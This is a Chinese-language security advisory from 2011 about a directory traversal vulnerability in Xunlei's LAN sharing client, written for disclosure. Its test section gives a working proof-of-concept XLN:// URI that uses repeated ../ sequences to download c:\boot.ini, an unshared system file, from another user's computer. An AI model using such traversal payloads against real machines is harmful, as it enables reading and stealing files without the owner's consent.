发布日期：2011-11-29
更新日期：2011-11-30

受影响系统：

XunLei 迅雷网邻

描述：

---

迅雷网邻，即以前的“迅雷邻居”，是迅雷网络开发的提供下载服务客户端软件迅雷7.2里应用市场的一款小软件，用于嗅探局域网内（或者附近）真实邻居，实现资源快速下载。具有精确定位、智能搜索、动态提醒等功能。

迅雷网邻在实现上存在目录遍历漏洞，远程攻击者可利用此漏洞下载对方未共享的任意文件。

<*来源：papaya
  
  链接：http://www.wooyun.org/bugs/wooyun-2010-03475
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

XLN://ykz-20090321XPO#00225F4F5066FLTQ/TDDOWNLOAD/RBD-316/../../../../../../c:\boot.ini

建议：

---

厂商补丁：

XunLei
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://dl.xunlei.com/wxl.html

浏览次数：3861
严重程度：0（网友投票）